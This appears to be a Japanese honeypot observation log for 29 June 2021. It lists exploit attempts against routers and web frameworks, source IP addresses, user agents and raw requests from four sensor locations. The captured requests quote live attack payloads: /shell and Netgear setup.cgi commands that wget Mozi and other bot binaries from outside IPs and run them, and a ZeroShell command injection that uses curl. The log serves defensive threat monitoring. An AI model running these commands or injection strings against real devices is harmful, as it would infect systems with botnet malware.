2021/06/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/06/29分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

ZeroShell Linux Routerの脆弱性(CVE-2020-29390)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
/.envへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  162.55.171.138/jaws;
sh /tmp/jaws

Location：US

DrayTek製品の脆弱性を狙うアクセス
Drupalの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
XTCによるスキャン行為
ZmEuによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 104.168.98.105/bins/z0r0.arm7;
chmod 777 /tmp/z0r0.arm7;
sh /tmp/z0r0.arm7 7Binks.Rep.Jaws

Location：UK

UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//27[.]45[.]90[.]190:45806/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Wgetによるスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//115[.]61[.]160[.]112:33077/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：52 (前日比：-18)
US：総アクセス数：234 (前日比：+191)
UK：総アクセス数：38 (前日比：-4)
SG：総アクセス数：52 (前日比：+11)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.53	Romania
7	4.71.37.45	United States
1	35.178.91.43	United States
1	40.77.17.11	United States
1	41.86.5.103	Liberia
1	42.232.224.124	China
11	45.146.165.123	Russia
1	52.224.55.170	United States
1	80.82.70.228	United Kingdom
1	82.165.189.67	Germany
1	104.210.211.179	United States
1	110.46.194.213	South Korea
5	111.7.96.140	China
1	124.130.118.243	China
1	134.119.189.158	Germany
1	161.35.154.103	United States
1	161.35.236.158	United States
1	165.22.210.88	United States
1	167.99.189.198	United States
1	176.10.99.200	Switzerland
2	179.43.187.242	Panama
1	183.136.225.14	China
1	192.228.100.100	United States
1	192.241.209.34	United States
1	192.241.214.186	United States
1	192.241.214.195	United States
1	199.19.224.201	United States
1	209.141.49.75	United States
3	216.4.95.61	United States

UserAgent一覧

件数	UserAgent
19	-
4	Chrome/54.0 (Windows NT 10.0)
1	Hello, World
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
8	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
3	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1
1		\x16\x03
3		\x16\x03\x01\x01\xfa\x01
1		\x16\x03\x02\x01o\x01
8	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=user&psd=user	HTTP/1.0
10	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/console/	HTTP/1.1
3	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ 162.55.171.138/jaws;sh+/tmp/jaws
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//169[.]254[.]169[.]254/latest/meta-data/	HTTP/1.1
2	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
4	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.10.150.40	Thailand
1	2.57.122.53	Romania
1	3.0.145.111	United States
1	40.76.236.126	United States
1	45.9.150.27	Dominica
6	45.61.184.166	United States
22	45.146.165.123	Russia
1	45.229.54.111	Brazil
2	47.93.23.61	China
7	47.245.57.120	United States
1	51.13.103.24	United Kingdom
3	51.158.78.179	France
1	68.183.8.215	United States
1	68.183.178.112	United States
1	74.102.39.43	United States
149	101.36.109.176	Hong Kong
1	120.82.119.104	China
1	120.85.198.90	China
1	129.213.160.208	United States
6	135.125.246.189	France
1	138.197.172.189	United States
1	142.93.222.8	United States
1	143.110.176.242	United States
1	143.110.220.177	United States
1	157.245.217.213	United States
1	159.65.19.132	United States
1	159.203.56.32	United States
1	162.62.123.46	Singapore
1	165.22.108.147	United States
1	165.227.224.121	United States
1	167.99.73.19	United States
1	178.62.207.158	United States
1	178.128.111.100	United States
1	178.128.113.207	United States
1	179.43.187.242	Panama
1	183.136.225.14	China
1	190.180.154.86	Argentina
1	192.241.213.192	United States
1	192.241.220.166	United States
1	192.241.222.160	United States
1	199.19.224.201	United States
1	199.19.225.175	United States
2	209.141.49.75	United States
1	220.134.146.95	Taiwan
1	223.149.162.216	China

UserAgent一覧

件数	UserAgent
58	-
1	Hello, world
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.52
117	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
22	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
9	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
3	Mozilla/5.0 zgrab/0.x
1	Wget/1.18 (linux-gnu)
1	XTC
6	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
31		-
1		\x16\x03\x01\x014\x01
15		\x16\x03\x01\x01\xfb\x01
3		\x16\x03\x01\x02
1		27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$	HTTP/1.0
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
10	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/Content/common/web/CommonActivity.css	HTTP/1.1
1	GET	/Content/css/wzwstylel.css	HTTP/1.1
1	GET	/Content/favicon.ico	HTTP/1.1
1	GET	/Css/Hm.css	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/HNAP1/	HTTP/1.1
1	GET	/Home/Bind/binding	HTTP/1.1
1	GET	/Home/Get/getJnd28	HTTP/1.1
1	GET	/Home/GetAllGameCategory	HTTP/1.1
1	GET	/Home/Index/ajaxTJ	HTTP/1.1
1	GET	/JS/loginstatus.js	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/Pc/Lang/index.html	HTTP/1.1
1	GET	/Promotions/list.mvc	HTTP/1.1
1	GET	/Public/Home/images/game/pk10.png	HTTP/1.1
1	GET	/Public/Home/js/cls.js	HTTP/1.1
1	GET	/Public/Home/js/common.js	HTTP/1.1
1	GET	/Public/Mobile/ecshe_css/wapmain.css?v=1545408652	HTTP/1.1
1	GET	/Public/home/js/check.js	HTTP/1.1
1	GET	/Public/home/wap/css/qdgame.css	HTTP/1.1
1	GET	/Public/initJs.php	HTTP/1.1
1	GET	/Public/js/common.js	HTTP/1.1
1	GET	/Public/mobile/js/config.js	HTTP/1.1
1	GET	/Recruit/download_url	HTTP/1.1
1	GET	/Template/Mobile/js/main.js	HTTP/1.1
1	GET	/Templates/user/finance/css/userPay.css	HTTP/1.1
1	GET	/Templates/user/js/global.js	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/index	HTTP/1.1
1	GET	/ajax/allcoin_a/id/0?t=0.3782499195965951	HTTP/1.1
1	GET	/ajax?act=getrlist&rid=1	HTTP/1.1
1	GET	/api/ApiHub/fetchJinse	HTTP/1.1
1	GET	/api/apps	HTTP/1.1
1	GET	/api/contactWay	HTTP/1.1
1	GET	/api/content_bottom	HTTP/1.1
1	GET	/api/exclude/siteConfig/webSiteConfig	HTTP/1.1
1	GET	/api/message/webInfo	HTTP/1.1
1	GET	/api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1	HTTP/1.1
1	GET	/api/stock/getSingleStock.do?code=002405	HTTP/1.1
1	GET	/api/uploads/apimap	HTTP/1.1
1	GET	/api/user/info?&&callback=jsonp_1601457046411_20983	HTTP/1.1
1	GET	/api/v/index/queryOfficePage?officeCode=customHomeLink	HTTP/1.1
1	GET	/api/v1/invest	HTTP/1.1
1	GET	/api/v1/member/kefu	HTTP/1.1
1	GET	/api/wallet/redDetail	HTTP/1.1
1	GET	/assets/dist/static/js/vendor_prod.js	HTTP/1.1
1	GET	/assets/js/dmshub.js	HTTP/1.1
1	GET	/assets/room/css/room_mobile.css	HTTP/1.1
1	GET	/base/exchange_article/index/classid/1/id/1	HTTP/1.1
1	GET	/base/exchange_index/changepwdfirst	HTTP/1.1
1	GET	/base/exchange_index/googlecode	HTTP/1.1
1	GET	/common/download.js	HTTP/1.1
1	GET	/common/template/lottery/lecai/css/style.css	HTTP/1.1
1	GET	/config.js	HTTP/1.1
1	GET	/config.php?_=3283&1922563758	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/csjs/bankCheck.js	HTTP/1.1
1	GET	/css/dafa.css	HTTP/1.1
1	GET	/css/main.css	HTTP/1.1
1	GET	/css/style.css	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
3	GET	/favicon.ico	HTTP/1.1
1	GET	/ff/css/cssy.css	HTTP/1.1
1	GET	/files/pub_rem.js	HTTP/1.1
1	GET	/files/pub_reset.css	HTTP/1.1
1	GET	/getConfig/getArticle.do?code=19	HTTP/1.1
1	GET	/getConfig/listPopFrame.do?code=14&position=index&_=1601489645097	HTTP/1.1
1	GET	/getLocale	HTTP/1.1
2	GET	/h5/	HTTP/1.1
1	GET	/homes/	HTTP/1.1
1	GET	/iframe/rankgiftgotapi/1005	HTTP/1.1
1	GET	/im/in/GetUuid	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index/Mobile/kline_week?code=sz003043	HTTP/1.1
1	GET	/index/index/andiro	HTTP/1.1
1	GET	/infe/rest/flash/getServerIP.json	HTTP/1.1
1	GET	/js/app.ling.js	HTTP/1.1
1	GET	/js/base.js	HTTP/1.1
1	GET	/js/dianzan.js	HTTP/1.1
1	GET	/js/tvConfig.js	HTTP/1.1
1	GET	/kkrps/im_group/show_members	HTTP/1.1
1	GET	/loan	HTTP/1.1
1	GET	/login/img/nyyh/chkjs.js	HTTP/1.1
1	GET	/login/img/nyyh/game.css	HTTP/1.1
1	GET	/m/	HTTP/1.1
1	GET	/m/ticker/usdtqc	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/js/left.js	HTTP/1.1
1	GET	/mobile/script/main.m.js	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/nmaplowercheck1624917704	HTTP/1.1
1	GET	/otc/	HTTP/1.1
1	GET	/pages/console/js/common.js	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/portal/index/protocol.html	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/wap/js/basis.js	HTTP/1.1
1	GET	/resources/main/common.js	HTTP/1.1
1	GET	/room/1002	HTTP/1.1
1	GET	/s_api/basic/config_js?callback=__set_config	HTTP/1.1
1	GET	/s_api/basic/download/info	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//1[.]10[.]150[.]40:43543/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]229[.]54[.]111:53995/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+104.168.98.105/bins/z0r0.arm7;chmod+777+/tmp/z0r0.arm7;sh+/tmp/z0r0.arm7+7Binks.Rep.Jaws	HTTP/1.1
1	GET	/site.js	HTTP/1.1
1	GET	/site/get-hq?proNo=btc&panType=1&pid=1	HTTP/1.1
1	GET	/skin/js/common.js	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/static/css/index.css	HTTP/1.1
1	GET	/static/data/thirdgames.json	HTTP/1.1
1	GET	/static/guide/ab.css	HTTP/1.1
1	GET	/static/home/static/js/login.js	HTTP/1.1
1	GET	/static/index/js/lk/order.js	HTTP/1.1
1	GET	/static/wap/css/index.css	HTTP/1.1
1	GET	/static/wap/js/common.js	HTTP/1.1
1	GET	/static/xianyu/js/bankCheck.js	HTTP/1.1
1	GET	/stock/search.html?keyword=00202	HTTP/1.1
1	GET	/style.css	HTTP/1.1
1	GET	/template/920ka/css/lsy.css	HTTP/1.1
1	GET	/template/920ka/js/woodyapp.js	HTTP/1.1
1	GET	/thriveGame.css	HTTP/1.1
1	GET	/user/Login	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wap/api/exchangerateuserconfig!get.action	HTTP/1.1
1	GET	/wap/trading/get_newallorder_ajax	HTTP/1.1
1	GET	/wap/trading/lastKlineParameter	HTTP/1.1
1	GET	/web/api/getBanner	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/ws/index/getTheLotteryInitList	HTTP/1.1
1	GET	/xy/image/jiantou.png	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/HNAP1/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/api/system/system/config/get	HTTP/1.1
5	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/config	HTTP/1.1
1	POST	/login/kefuxian.mvc	HTTP/1.1
1	POST	/m.api	HTTP/1.1
1	POST	/sdk	HTTP/1.1
1	POST	/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//withthis[.]site/7229ebd93edecfa44c3a78bc9bad771920404c83330a318129cac9fd0619797b6f9086bedce0d3cbf64825016d01bc06aa24cec28224599f5a6997cadcf14c70ab03ef943e1b3ac29989c7a28be7e5215140c1e8bf550b55221f7eb21e343913	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	27.45.90.190	China
11	45.146.165.123	Russia
1	103.47.104.224	India
1	115.53.252.153	China
1	117.251.58.79	India
10	118.25.227.72	China
1	120.85.93.0	China
1	128.199.0.53	United Kingdom
1	134.209.199.138	United States
1	162.62.123.46	Singapore
1	179.43.187.242	Panama
1	192.241.213.224	United States
1	192.241.214.224	United States
1	199.19.224.153	United States
1	199.19.224.201	United States
2	199.19.225.175	United States
2	209.141.49.75	United States

UserAgent一覧

件数	UserAgent
6	-
1	Go-http-client/1.1
1	Hello, World
1	Hello, world
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
6	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 zgrab/0.x
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01\x01\xfc\x01
1		27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
1	GET	/console/	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/nice%20ports%2C/Tri%6Eity.txt%2ebak	HTTP/1.0
1	GET	/public/index.php	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]45[.]90[.]190:45806/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
6	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	37.49.225.132	Belize
3	43.226.153.11	China
1	45.9.150.27	Dominica
11	45.146.165.123	Russia
1	47.241.253.80	United States
1	59.94.203.148	India
10	60.205.137.46	China
1	89.248.165.165	United Kingdom
1	103.28.70.137	United States
1	115.61.160.112	China
1	138.68.157.241	United States
3	163.172.159.134	United Kingdom
2	179.43.187.242	Panama
1	183.136.225.14	China
1	192.241.217.22	United States
1	192.241.219.222	United States
1	192.241.222.133	United States
2	198.232.118.99	United States
1	199.19.224.201	United States
4	199.19.225.175	United States
1	209.141.49.75	United States
1	211.171.233.177	South Korea

UserAgent一覧

件数	UserAgent
11	-
1	Hello, World
1	Hello, world
2	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3; rv:52.7.2) Gecko/20100101 Firefox/52.7.2
3	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
5	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
8	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
3	Mozilla/5.0 zgrab/0.x
1	Wget/1.18 (linux-gnu)

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
1		\x16\x03\x01\x014\x01
6		\x16\x03\x01\x02
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
6	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/nmaplowercheck1624859870	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/phpmyadmin4.8.5/index.php	HTTP/1.1
1	GET	/pmd/index.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]94[.]203[.]148:53380/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]61[.]160[.]112:33077/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//passport[.]baidu[.]com/	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
8	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/sdk	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//impius[.]fun/0ccf4fab7bf74a3889c531a3db740b505ff3f867983de8f497cccf7f74041aa1238ff65fe62f01f240e5d6519920dffed2388471fbfcacd9cc03eaf0700820e5cc5b3118b9883e5c4ac5079e35c16fbb317e3ce92d3fbc8f5b226655dfd78187	HTTP/1.1